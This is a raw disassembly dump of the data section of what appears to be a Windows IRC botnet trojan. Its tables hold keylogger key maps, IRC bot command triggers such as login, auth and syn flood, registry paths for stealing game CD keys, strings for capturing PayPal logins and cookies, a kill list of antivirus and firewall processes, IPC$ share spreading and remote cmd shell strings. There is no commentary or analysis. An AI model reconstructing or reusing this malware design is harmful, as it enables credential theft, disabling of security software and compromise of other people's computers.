dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_4421F4 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_414BFB+2A6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 3 dup(0)
off_442230 dd offset dword_4352D0 ; DATA XREF: sub_414ECA+1F7�r
dd offset off_4352CC
dd offset aFtp ; "FTP"
dd offset aHttp_0 ; "HTTP"
; char a_login[]
a_login db ':.login',0 ; DATA XREF: sub_414ECA+1A3�o
dd 3 dup(0)
dword_442254 dd 0 ; DATA XREF: sub_414ECA+1F0�r
aLogin_2 db ':,login',0
dd 4 dup(0)
aLogin_3 db ':!login',0
dd 4 dup(0)
a@login db ':@login',0
dd 4 dup(0)
aLogin_4 db ':$login',0
dd 4 dup(0)
aLogin_5 db ':%login',0
dd 4 dup(0)
aLogin_6 db ':^login',0
dd 4 dup(0)
aLogin_7 db ':&login',0
dd 4 dup(0)
aLogin_8 db ':*login',0
dd 4 dup(0)
aLogin_9 db ':-login',0
dd 4 dup(0)
aLogin_10 db ':+login',0
dd 4 dup(0)
aLogin_11 db ':/login',0
dd 4 dup(0)
aLogin_12 db ':\login',0
dd 4 dup(0)
aLogin_13 db ':=login',0
dd 4 dup(0)
a?login db ':?login',0
dd 4 dup(0)
aLogin_14 db ':',27h,'login',0
dd 4 dup(0)
aLogin_15 db ':`login',0
dd 4 dup(0)
aLogin_16 db ':~login',0
dd 4 dup(0)
aLogin_17 db ': login',0
dd 4 dup(0)
a_auth db ':.auth',0
align 10h
dd 4 dup(0)
aAuth db ':,auth',0
align 4
dd 4 dup(0)
aAuth_0 db ':!auth',0
align 10h
dd 4 dup(0)
a@auth db ':@auth',0
align 4
dd 4 dup(0)
aAuth_1 db ':$auth',0
align 10h
dd 4 dup(0)
aAuth_2 db ':%auth',0
align 4
dd 4 dup(0)
aAuth_3 db ':^auth',0
align 10h
dd 4 dup(0)
aAuth_4 db ':&auth',0
align 4
dd 4 dup(0)
aAuth_5 db ':*auth',0
align 10h
dd 4 dup(0)
aAuth_6 db ':-auth',0
align 4
dd 4 dup(0)
aAuth_7 db ':+auth',0
align 10h
dd 4 dup(0)
aAuth_8 db ':/auth',0
align 4
dd 4 dup(0)
aAuth_9 db ':\auth',0
align 10h
dd 4 dup(0)
aAuth_10 db ':=auth',0
align 4
dd 4 dup(0)
a?auth db ':?auth',0
align 10h
dd 4 dup(0)
aAuth_11 db ':',27h,'auth',0
align 4
dd 4 dup(0)
aAuth_12 db ':`auth',0
align 10h
dd 4 dup(0)
aAuth_13 db ':~auth',0
align 4
dd 4 dup(0)
aAuth_14 db ': auth',0
align 10h
dd 4 dup(0)
a_id db ':.id',0
align 4
dd 4 dup(0)
aId_0 db ':,id',0
align 10h
dd 4 dup(0)
aId_1 db ':!id',0
align 4
dd 4 dup(0)
a@id db ':@id',0
align 10h
dd 4 dup(0)
aId_2 db ':$id',0
align 4
dd 4 dup(0)
aId_3 db ':%id',0
align 10h
dd 4 dup(0)
aId_4 db ':^id',0
align 4
dd 4 dup(0)
aId_5 db ':&id',0
align 10h
dd 4 dup(0)
aId_6 db ':*id',0
align 4
dd 4 dup(0)
aId_7 db ':-id',0
align 10h
dd 4 dup(0)
aId_8 db ':+id',0
align 4
dd 4 dup(0)
aId_9 db ':/id',0
align 10h
dd 4 dup(0)
aId_10 db ':\id',0
align 4
dd 4 dup(0)
aId_11 db ':=id',0
align 10h
dd 4 dup(0)
a?id db ':?id',0
align 4
dd 4 dup(0)
aId_12 db ':',27h,'id',0
align 10h
dd 4 dup(0)
aId_13 db ':`id',0
align 4
dd 4 dup(0)
aId_14 db ':~id',0
align 10h
dd 4 dup(0)
aId_15 db ': id',0
align 4
dd 4 dup(0)
a_hashin_0 db ':.hashin',0
align 10h
aHashin_0 db ':!hashin',0
align 4
dd 3 dup(0)
aHashin_1 db ':$hashin',0
align 10h
aHashin_2 db ':%hashin',0
align 4
dd 3 dup(0)
a_secure db ':.secure',0
align 10h
aSecure_1 db ':!secure',0
align 4
dd 3 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
a_syn db ':.syn',0
align 10h
dd 4 dup(0)
aSyn_0 db ':!syn',0
align 4
dd 4 dup(0)
aSyn_1 db ':$syn',0
align 10h
dd 4 dup(0)
aSyn_2 db ':%syn',0
align 4
dd 4 dup(0)
aCdkey_0 db ' CDKey ',0
dd 4 dup(0)
aJoin_1 db 'JOIN #',0
align 4
dd 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
dd 80000001h
off_442A9C dd offset aSoftwareValveC ; DATA XREF: sub_4185EA+C�r
; sub_4185EA+21�o
; "Software\\Valve\\CounterStrike\\Settings"
dd offset aCdkey ; "CDKey"
dd offset aCounterStrikeR ; "Counter-Strike (Retail)"
dword_442AA8 dd 2 dup(0) ; DATA XREF: sub_4185EA+26�o
dd 80000001h, 436B20h, 436B14h, 436B04h, 2 dup(0)
dd 80000001h, 436AE4h, 436AE0h, 436ACCh, 2 dup(0)
dd 80000001h, 436AA8h, 436AE0h, 436A9Ch, 2 dup(0)
dd 80000001h, 436A78h, 436A70h, 436A5Ch, 2 dup(0)
dd 80000001h, 436A48h, 436A38h, 436A1Ch, 2 dup(0)
dd 80000001h, 4369D8h, 436B60h, 4369C4h, 2 dup(0)
dd 80000002h, 436998h, 43698Ch, 43696Ch, 2 dup(0)
dd 80000002h, 436938h, 436B60h, 436920h, 2 dup(0)
dd 80000002h, 4368ECh, 436B60h, 4368D4h, 2 dup(0)
dd 80000002h, 4368BCh, 436B60h, 4368A4h, 2 dup(0)
dd 80000002h, 436868h, 42B633h, 436858h, 2 dup(0)
dd 80000002h, 436820h, 42B633h, 43680Ch, 2 dup(0)
dd 80000002h, 4367C0h, 42B633h, 4367A0h, 2 dup(0)
dd 80000002h, 436750h, 42B633h, 436720h, 2 dup(0)
dd 80000002h, 4366E4h, 42B633h, 4366D0h, 2 dup(0)
dd 80000002h, 436698h, 42B633h, 436688h, 2 dup(0)
dd 80000002h, 436638h, 42B633h, 436608h, 2 dup(0)
dd 80000002h, 4365C8h, 42B633h, 4365A8h, 2 dup(0)
dd 80000002h, 436578h, 42B633h, 436558h, 2 dup(0)
dd 80000002h, 43651Ch, 42B633h, 436508h, 2 dup(0)
dd 80000002h, 4364C0h, 42B633h, 43649Ch, 2 dup(0)
dd 80000002h, 436448h, 42B633h, 436418h, 2 dup(0)
dd 80000002h, 4363C8h, 42B633h, 43639Ch, 2 dup(0)
dd 80000002h, 43635Ch, 436354h, 436334h, 2 dup(0)
dd 80000002h, 4362F0h, 42B633h, 4362D4h, 2 dup(0)
dd 80000002h, 436288h, 42B633h, 436264h, 2 dup(0)
dd 80000002h, 436230h, 42B633h, 436224h, 2 dup(0)
dd 80000002h, 4361F0h, 42B633h, 4361E4h, 2 dup(0)
dd 80000002h, 4361B0h, 42B633h, 4361A4h, 2 dup(0)
dd 80000002h, 436170h, 42B633h, 436164h, 2 dup(0)
dd 80000002h, 436128h, 42B633h, 436114h, 2 dup(0)
dd 80000002h, 4360D8h, 42B633h, 4360C4h, 2 dup(0)
dd 80000002h, 436094h, 436B60h, 436078h, 2 dup(0)
dd 80000002h, 436058h, 436050h, 43602Ch, 2 dup(0)
dd 80000002h, 436010h, 436050h, 435FF0h, 2 dup(0)
dd 80000002h, 435FD0h, 436050h, 435FACh, 2 dup(0)
dd 80000002h, 435F94h, 436050h, 435F90h, 2 dup(0)
dd 80000002h, 435F74h, 435F64h, 435F5Ch, 2 dup(0)
dd 80000002h, 435F28h, 42F654h, 435F10h, 2 dup(0)
dd 80000002h, 435ED4h, 435EC8h, 435EA0h, 435E90h, 435E7Ch
dd 80000002h, 435E58h, 435E4Ch, 435E38h, 435E28h, 435E20h
dd 80000002h, 435E58h, 435E4Ch, 435DF4h, 435E28h, 435DECh
dd 80000002h, 435E58h, 435E4Ch, 435DBCh, 435E28h, 435DB4h
dd 6 dup(0)
; char *off_442ED0
off_442ED0 dd offset aQ ; DATA XREF: sub_41A293+5C�r
; "q"
dd offset aW_0 ; "w"
dd offset aE ; "e"
dd offset aR ; "r"
dd offset aT ; "t"
dd offset aY_0 ; "y"
dd offset aU ; "u"
dd offset aI ; "i"
dd offset aP ; "p"
dd offset aA ; "a"
dd offset aS_6 ; "s"
dd offset aD_0 ; "d"
dd offset aF_1 ; "f"
dd offset aG_0 ; "g"
dd offset asc_437A98 ; "h"
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset asc_42FB98 ; "l"
dd offset aZ_0 ; "z"
dd offset asc_437A90 ; "x"
dd offset aC ; "c"
dd offset aV ; "v"
dd offset aB_0 ; "b"
dd offset aN ; "n"
dd offset aM_0 ; "m"
dd offset aQ_0 ; "Q"
dd offset aW ; "W"
dd offset aE_0 ; "E"
dd offset aR_0 ; "R"
dd offset aT_0 ; "T"
dd offset aY ; "Y"
dd offset aU_0 ; "U"
dd offset aI_0 ; "I"
dd offset aO_0 ; "O"
dd offset aP_0 ; "P"
dd offset aA_0 ; "A"
dd offset aS_10 ; "S"
dd offset aD_2 ; "D"
dd offset aF_0 ; "F"
dd offset aG ; "G"
dd offset asc_437A54 ; "H"
dd offset aJ_0 ; "J"
dd offset aK_0 ; "K"
dd offset asc_437A48 ; "L"
dd offset aZ ; "Z"
dd offset asc_437A40 ; "X"
dd offset aC_3 ; "C"
dd offset aV_0 ; "V"
dd offset aB ; "B"
dd offset aN_0 ; "N"
dd offset aM_1 ; "M"
dd offset aSmartmir ; "SMARTMIR"
dd offset aFarooq ; "farooq"
dd offset aMaxxguy ; "maxxguy"
dd offset aBobmarley ; "BOBMARLEY"
dd offset aEmilya ; "emilya"
dd offset aKrizha ; "KRIZHA"
dd offset aCar1nna ; "Car1nna"
dd offset aSwin ; "swin"
dd offset aMale ; "male"
dd offset aKoko ; "koko"
dd offset aFlexster ; "flexster"
dd offset aKen ; "ken"
dd offset aShez ; "Shez"
dd offset aTalika ; "talika"
dd offset aMarcy ; "marcy"
dd offset aCme ; "cme"
dd offset aHeval ; "heval"
dd offset aBunty ; "bunty"
dd offset aJanno ; "janno"
dd offset aRimpy ; "rimpy"
dd offset aNastysha ; "nastysha"
dd offset aLuisa ; "Luisa"
dd offset aTroller ; "troller"
dd offset aManee ; "manee"
dd offset aKermit ; "kermit"
dd offset aPuregold ; "puregold"
dd offset aCoredump ; "CoreDump"
dd offset aImra ; "imra"
dd offset aGirl_0 ; "GirL"
dd offset aCamel ; "CAMEL"
dd offset aReshma ; "reshma"
dd offset aKencing ; "Kencing"
dd offset aThr45h3r5 ; "THR45H3R5"
dd offset aCansuuuu ; "cansuuuu"
dd offset aKaan38dent ; "kaan38dent"
dd offset aErkan27 ; "erkan27"
dd offset aHexaaa ; "hexaaa"
dd offset aBerk19 ; "berk19"
dd offset aObenibisevse ; "OBeNiBiSeVSe"
dd offset aIrmal ; "irmal"
dd offset aMisssunday ; "misssunday"
dd offset aTolga34 ; "Tolga34"
dd offset aJericho ; "JERICHO"
dd offset aMary_0 ; "MARY"
dd offset aAkin ; "AKIN"
dd offset aMelekk ; "melekk"
dd offset aTrend3 ; "trend3"
dd offset aMERVE ; "M-E-R-V-E"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSudenur ; "SUDENUR"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiramit ; "PIRAMIT"
dd offset aSamyeli21 ; "samyeli21"
dd offset aRetg ; "RETG"
dd offset aBlackpearl ; "blackpearl"
dd offset aPelincik ; "pelincik"
dd offset aAhmet ; "ahmet"
dd offset aTurkyy ; "turkyy"
dd offset aAnk32m ; "ank32m"
dd offset aZack ; "ZACK"
dd offset aIzmir39m ; "Izmir39m"
dd offset aAlbina ; "albina"
dd offset aAyla ; "AYLA-"
dd offset off_4377C4
dd offset aAnkh ; "ankh"
dd offset aDonjuanm ; "Donjuanm"
dd offset aBogac ; "bogac"
dd offset aAlpay34m ; "alpay34m"
dd offset aCongueror ; "CoNGuERoR"
dd offset aDenizlim ; "DenizliM"
dd offset aBerk19m ; "Berk19m"
dd offset aDevran ; "devran"
dd offset aArda ; "arda"
dd offset aKeyiflisert ; "keyifliSERT"
dd offset aMurat34M ; "murat34-m"
dd offset aHakan3 ; "hakan3"
dd offset aImirzali ; "IMIRZALI--"
dd offset aRamtha ; "RAMTHA"
dd offset aEmre ; "Emre--"
dd offset aElmaazyok ; "elmaazyok"
dd offset aEsmerkiz ; "Esmerkiz"
dd offset aKebikec ; "kebikec"
dd offset aFlord ; "FLoRD"
dd offset aHoly ; "holy"
dd offset aMahinur ; "MAHINUR"
dd offset aSadikaellesme ; "SaDIkaEllesme"
dd offset aAykut1 ; "aykut1"
dd offset aKashmira ; "Kashmira"
dd offset aSeviseli ; "SeViSeLi"
dd offset aSugarboy ; "SUGARBOY-"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAdalim ; "ADALIM"
dd offset aUmut ; "umut-"
dd offset aAnk32M ; "ANK-32-M"
dd offset aDjspace ; "DJSPACE"
dd offset aAnkar ; "Ankar"
dd offset aFenerlee ; "FeNeRLee"
dd offset aHayran ; "hayran"
dd offset aAngelgirl ; "angelgirl"
dd offset aKapk ; "kapk"
dd offset aAchilles ; "Achilles"
dd offset aTegmen ; "TEGMEN"
dd offset aKotan ; "kotan"
dd offset aSevda ; "sevda"
dd offset off_437630
dd offset aAlcatras ; "alcatras"
dd offset aA44m ; "a44m"
dd offset aBirsen ; "birsen"
dd offset aYabanc ; "yabanc"
dd offset aDevre ; "devre"
dd offset aErkan ; "erkan"
dd offset aAnkm ; "ankM"
dd offset aAdem28 ; "Adem28"
dd offset aMaxsilla ; "maxsilla"
dd offset aM41ist ; "M41IST"
dd offset aAdamm33 ; "AdAMM33"
dd offset aFirtina ; "firtina"
dd offset aAta29 ; "Ata29"
dd offset aKoray ; "KORAY"
dd offset aAkden ; "akden"
dd offset aIzmirlm ; "izmirlm"
dd offset aUla ; "ula"
dd offset aNeHaber ; "NE-HABER"
dd offset aPassenger ; "passenger"
dd offset aTropikal ; "tropikal"
dd offset aCool30m ; "cool30m"
dd offset aCem39 ; "cem39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN```"
dd offset aDallas43m ; "DALLAS43M"
dd offset aPrometheus ; "prometheus"
dd offset aMaveRIck ; "MaVe{R}icK"
dd offset aAdamm ; "ADAMM"
dd offset aCumhur29 ; "cumhur29"
dd offset aWantedlove ; "WANTEDLOVE"
; char *off_4431D0
off_4431D0 dd offset aSex ; DATA XREF: sub_41A293+41�r
; sub_41A293+EB�r
; "sex"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset aBad ; "bad"
dd offset aLag ; "lag"
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot_0 ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex_0 ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuvuF ; "||luvu-f|"
dd offset aWiked ; "|wiked|"
dd offset aSick ; "sick}}"
dd offset aQ8 ; "Q8"
dd offset aQ8A ; "|q8|a"
dd offset aB_0 ; "b"
dd offset aC ; "c"
dd offset aD_0 ; "d"
dd offset aE ; "e"
dd offset aF_1 ; "f"
dd offset aG_0 ; "g"
dd offset asc_437A98 ; "h"
dd offset aI ; "i"
dd offset a_ ; "_"
dd offset aJ ; "j"
dd offset aK ; "k"
dd offset asc_42FB98 ; "l"
dd offset aM_0 ; "m"
dd offset aN ; "n"
dd offset aO ; "o"
dd offset aP ; "p"
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset aT ; "t"
dd offset aU ; "u"
dd offset aV ; "v"
dd offset aW_0 ; "w"
dd offset asc_437A90 ; "x"
dd offset aY_0 ; "y"
dd offset aZ_0 ; "z"
dd offset aHappy ; "happy"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aSdf ; "sdf"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTrimy ; "trimy"
dd offset aTruck ; "truck"
dd offset aMuckc ; "muckc"
dd offset aZ_0 ; "z"
dd offset aG_0 ; "g"
dd offset aS_6 ; "s"
dd offset aQ ; "q"
dd offset off_437450
dd offset aBbl ; "|bbl"
dd offset byte_42B633
dd offset byte_42B633
dd offset a___0 ; "_|_"
dd offset byte_42B633
dd offset byte_42B633
dd offset byte_42B633
dd offset byte_42B633
dd offset aF_0 ; "F"
dd offset aM_1 ; "M"
dd offset aLuvu ; "LUVU"
dd offset aSad ; "Sad"
dd offset aF ; "^^^f^"
dd offset aB_0 ; "b"
dd offset byte_42B633
dd offset aSleeping ; "Sleeping"
dd offset byte_42B633
dd offset byte_42B633
dd offset aFuck_0 ; "Fuck"
dd offset aFree ; "Free"
dd offset byte_42B633
dd offset byte_42B633
dd offset asc_437A40 ; "X"
dd offset byte_42B633
dd offset aBoy ; "BOY"
dd offset aGirl ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset aAha ; "aha"
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0 ; "mof0"
dd offset aMofo ; "mofo"
dd offset aTot ; "tot"
dd offset aLol ; "lol"
dd offset aLoloA ; "lolo|a|"
dd offset aSex4free ; "|sex4free|"
dd offset a4us ; "|4us|"
dd offset a4you ; "{4you}"
dd offset dword_437368+38h
dd offset dword_437368+34h
dd offset dword_437368+30h
dword_443368 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: sub_41AA0A+A6�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_4433B4 dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: sub_41AA0A+E5�o
dword_4433D0 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: sub_41AA0A+11A�o
dword_4433E4 dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: sub_41AA0A+141�o
off_4433F8 dd offset aAdd ; DATA XREF: sub_41BF46+59�r
; sub_41BFBE+4A�r ...
; "Add"
off_4433FC dd offset aAdded ; DATA XREF: sub_41BF46+2D�r
; sub_41BFBE+7C�r ...
; "Added"
dword_443400 dd 0 ; DATA XREF: sub_41BF46+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 437D10h, 437D08h, 2, 437CFCh, 437CF0h, 3, 0
dword_443450 dd 7530h ; DATA XREF: sub_41C76D+12�r
align 8
off_443458 dd offset aRegedit_exe ; DATA XREF: sub_41C444:loc_41C50C�r
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe_0 ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aMsblast_exe ; "MSBLAST.exe"
dd offset aTeekids_exe ; "teekids.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
off_4434B8 dd offset aIpc ; DATA XREF: sub_41CB8D:loc_41CD3E�r
; sub_41CB8D+1BF�r ...
; "IPC$"
dword_4434BC dd 0 ; DATA XREF: sub_41CEAF:loc_41D02C�r
dd offset dword_438C80+10h
align 8
dd offset dword_438C80+0Ch
dd offset dword_438C80+8
dd offset dword_438C80+4
dd offset dword_438C80
byte_4434D8 db 63h ; DATA XREF: .text:0041DF27�o
; .text:0041DF41�r ...
db 6Dh, 64h, 0
aExit db 'exit',0 ; DATA XREF: .text:0041E0A2�o
; .text:0041E0B7�r
align 10h
dword_4434F0 dd 6A14h ; DATA XREF: sub_41ECD4+4�w _rand�r ...
align 10h
off_443500 dd offset dword_4E2F20 ; DATA XREF: ___initstdio+52�o
align 8
dd offset dword_4E2F20
dd 101h
dword_443510 dd 0FFFFFFFFh, 0 ; DATA XREF: ___initstdio+71�o
dd 1000h, 0
; FILE stru_443520
stru_443520 FILE <0, 0, 0, 2, 0FFFFFFFFh, 0, 0, 0> ; DATA XREF: sub_40E3B2+17C�o
; __flsbuf+53�o ...
dword_443540 dd 3 dup(0) ; DATA XREF: __flsbuf+5B�o
; __stbuf:loc_422C8C�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_443570 dd 84h dup(0) ; DATA XREF: ___initstdio+9A�o
dword_443780 dd 9875h, 9873h ; DATA XREF: ___initstdio+67�o
off_443788 dd offset __fpmath ; DATA XREF: __cinit�r
dd offset nullsub_1
dd offset nullsub_1
dword_443794 dd 19930520h, 3 dup(0) ; DATA XREF: __NLG_Notify1+2�o
; __NLG_Notify+2�o
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 10h
; size_t MaxCount
MaxCount dd 1 ; DATA XREF: sub_40F87A+68�r
; _strtoxl:loc_41EAC7�r ...
byte_4437B4 db 2Eh ; DATA XREF: __input:loc_423747�r
; __input+447�r ...
align 4
dd 1, 0
off_4437C0 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_4437C4 dd 2 ; DATA XREF: __NMSG_WRITE+58�r
; __FF_MSGBANNER+E�r ...
dd 10h
off_4437CC dd offset aNull ; DATA XREF: __output:loc_4226C0�r
; __output+51C�r
; "(null)"
off_4437D0 dd offset aNull_0 ; DATA XREF: __output+2D8�r
; "(null)"
dword_4437D4 dd 0E6F4816Ah ; DATA XREF: _strtok+6�r
; CatchGuardHandler(EHExceptionRecord *,CatchGuardRN *,void *,void *)+8�r ...
off_4437D8 dd offset asc_4397E0 ; DATA XREF: _strtoxl:loc_41EADF�r
; _strtoxl:loc_41EB74�r ...
; " ((((( H"
off_4437DC dd offset word_4399E2 ; DATA XREF: _iswctype+18�r
dword_4437E0 dd 1 ; DATA XREF: __dosmaperr:loc_422C1A�r
dword_4437E4 dd 16h ; DATA XREF: __dosmaperr:loc_422C3E�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
byte_443948 db 1 ; DATA XREF: __setmbcp+120�r
db 2, 4, 8
align 10h
dword_443950 dd 3A4h ; DATA XREF: __setmbcp:loc_422F91�r
dword_443954 dd 82798260h ; DATA XREF: __setmbcp+15C�r
dd 21h, 0
dword_443960 dd 0DFA6h ; DATA XREF: __setmbcp+100�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
